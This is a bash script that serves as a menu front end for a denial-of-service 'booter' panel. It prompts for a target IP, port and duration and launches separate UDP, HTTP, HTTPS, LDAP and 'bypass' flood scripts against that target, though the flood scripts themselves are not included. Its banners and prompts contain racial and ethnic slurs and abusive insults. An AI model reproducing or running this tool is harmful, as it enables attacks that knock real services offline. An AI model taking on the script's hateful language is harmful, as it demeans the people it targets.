#!/bin/bash
BLACK='\e[0;30m'
CYAN='\e[0;34m'
CYAN='\e[0;32m'
CYAN='\e[0;36m'
RED='\e[0;31m'
CYAN='\e[0;35m'
RED='\e[0;33m'
CYAN='\e[0;37m'
CYAN='\e[1;30m'
CYAN='\e[1;34m'
CYAN='\e[1;32m'
BLUE='\e[1;36m'
CYAN='\e[1;31m'
CYAN='\e[1;35m'
CYAN='\e[1;33m'
CYAN='\e[0;37m'
CYAN='\e[1;37m'
PINK='\e[1;35m'
GREEN='\e[1;32m'
NC='\e[0m'              # No Color
# Trap Signal Script
#
#TitaniumScript.bypass//BASH  Bypass.Function
#load
exit_script()
{
  echo "* * *Trap * * *"
  ./m
}

dstat1()
{
    clear
    echo -e " ${GREEN} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                          DSTAT NIGGA                             ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
dstat
    
}

admin12()
{
    clear
    echo -e " ${GREEN} "
	echo "  +-----------------------------------------------------------------------+ "
    echo "  ¦¦¦                       EAT MY SHINY ASS                              ¦¦¦ "
    echo "  +-----------------------------------------------------------------------+ "                                                         
echo ":3"
echo ""
echo "ENTER BLOODCLOT'S IP :"
read ip
echo "PORT :"
read port
echo "TIME :"
read time
python gott.2.py $ip $port $time
}

credits(){
clear
echo -e " ${GREEN} "
echo "  +-----------------------------------------------------------------------+ "
echo "  ¦¦¦                        **CREDIS**                                 ¦¦¦ "
echo "  +-----------------------------------------------------------------------+ "                                                         
echo -e "  ¦¦¦${CYAN}                            JAGER: MENU BASE             ¦¦¦ " 
echo -e "  ¦¦¦${CYAN}                            ISOLATION XY: EDITOR         ¦¦¦ "
echo "  +-----------------------------------------------------------------------+ "
echo "  ¦¦¦                         **MY BOIS**                               ¦¦¦ "
echo "  ¦¦¦+--------------------------------------------------------------------+ "
echo -e "  ¦¦¦${CYAN}               FBI SCARECROW                             ¦¦¦ " 
echo -e "  ¦¦¦${CYAN}               YFN                                       ¦¦¦ " 
echo -e "  ¦¦¦${CYAN}               YOURDOGISPHIL                             ¦¦¦ "
echo -e "  ¦¦¦${CYAN}               XNIJIXISO                                 ¦¦¦ "
echo -e "  ¦¦¦${CYAN}               ALPHY                                     ¦¦¦ "
echo -e "  ¦¦¦${CYAN}               PLUS.BEST                                 ¦¦¦ "
echo -e "  ¦¦¦${CYAN}               R6BEAST                                   ¦¦¦ "
echo "  ¦¦¦+--------------------------------------------------------------------+ "
}

udp_flooda(){
echo -en "ENTER BLOODCLOT'S IP :"
read ip
echo -en "PORT :"
read port
echo -en "TIME :"
read time
python gott.2.py ${ip} ${port} ${time}
}

udp_floodb(){
echo -en "ENTER SICK CUNT'S IP :"
read ip
echo -en "PORT :"
read port
echo -en "PACKETS (65500) :"
read packets
echo -en "TIME :"
read time
python gott.1.py ${ip} ${port} ${packets} ${time}
}

ldap(){
echo -en "ENTER SICK DOG'S IP :"
read ip
echo -en "PORT :"
read port
echo -en "TIME :"
read time
perl gott.3.pl ${ip} ${port} ${time}
}

xsshex(){
echo -en "ENTER PAKISTANI'S IP :"
read ip
echo -en "PORT :"
read port
echo -en "PACKETS (65500) :"
read packets
echo -en "TIME :"
read time
perl gott.4.pl ${ip} ${port} ${packets} ${time}
}

privbypass(){
echo -en "HOST :"
read ip
echo -en "TIME :"
read time
perl gott.5.pl ${ip} ${time}
}

http(){
echo -en "URL :"
read url
perl gott.6.pl ${url} 1000 50 100
}

speedtest(){
python speedtest.py
}

snake(){
python snake.py
}

sinfull(){
perl gott.7.c
}

x8g7(){
echo -en "VICTIM'S IP :"
read ip
echo -en "PORT :"
read port
echo -en "TIME :"
read time
perl gott.8.pl ${ip} ${port} 65500 ${time}
}

https(){
echo -en "URL :"
read url
perl gott.9.pl ${url} 200 200 8.8.8.8
}

fbi(){
echo -en "IP :"
read ip
echo -en "PORT :"
read port
echo -en "TIME :"
read time
perl gott.10.pl ${ip} ${port} 65500 ${time}
}

nfobypass(){
echo -en "HOST :"
read host
echo -en "PORT :"
read port
./gott.11 ${host} ${port}
}

exit_script1()
{
  exit 1
}

Take_input1()
{
clear
while :
do
clear;clear
echo -en "${PINK}# 1.31 ${CYAN}PRIAVTE BY :ISOLATION XY  :$    
${CYAN}============================================
${BLUE}*SICK CUNTS AYEEEEEE*                                        
${CYAN}PRESS 1 UDP SLAM 1
${BLUE}PRESS 2 UDP SLAM 2
${CYAN}PRESS 3 X8G7 PRIV UDP
${BLUE}PRESS 4 FBI SCARECROW UDP ;)
${CYAN}PRESS 5 LDAP
${BLUE}PRESS 6 STD         
${CYAN}PRESS 7 XSSHEX
${BLUE}PRESS 8 PRIVATE BYPASS
${CYAN}PRESS 9 NFO BYPASS
${BLUE}PRESS 10 HTTP FLOOD
${CYAN}PRESS 11 HTTPS FLOOD
${BLUE}PRESS 12 SINFULL SCRIPT
${CYAN}PRESS 13 SCREEN CMD
${BLUE}PRESS 14 SNAKE GAME
${CYAN}PRESS 15 SPEEDTEST
${BLUE}PRESS 16 DSTAT 1         
${CYAN}PRESS 17 DSTAT 2        
${BLUE}PRESS CTRL+C TO STOP SLAMMING SKIDS.
$(CYAN)TYPE C TO SHOW CREDITS **     
${BLUE}TYPE X TO CLOSE.
${CYAN}+++++++++++++++++++++++           
${CYAN}PRIVATE EDITION: ${PINK}1.31             
${CYAN}============================================
${CYAN}#${USERNAME}-[DICKHEAD INPUT SELECTION:${CYAN}"
    read yourch
    case $yourch in
      1) udp_flooda ;;
      2) udp_floodb ;;
	  3) x8g7 ;;
	  4) fbi ;;
	  5) ldap ;;
	  6) nfobypass ;;
	  7) xsshex ;;
	  8) privbypass ;;
	  9) nfobypass ;;
	  10) http ;;
	  11) https ;;
	  12) sinfull ; exit 1 ;;
	  14) snake ;;
	  13) echo "**TYPE SCREEN **REOPEN PANEL" ; exit 1 ;;
	  15) speedtest ;;
	  16) vnstat -l -i eth0 ;;
	  17) dstat1 ;;
	  C) credits ; exit 1 ;;
	  X) echo "As you Command" ; exit 1  ;;
      *) echo "INVALID SELECTION, PRESS [1-4-6-8]" ;
         echo "PRESS ENTER. . ." ; read ;;
 esac
done # end_while
}
#
# Set trap to for CTRL+C interrupt i.e. Install our error handler
# When occurs it first it calls del_file() and then exit
#
trap exit_script 2
#
# Call our user define function : Take_inpt1
#

Take_input1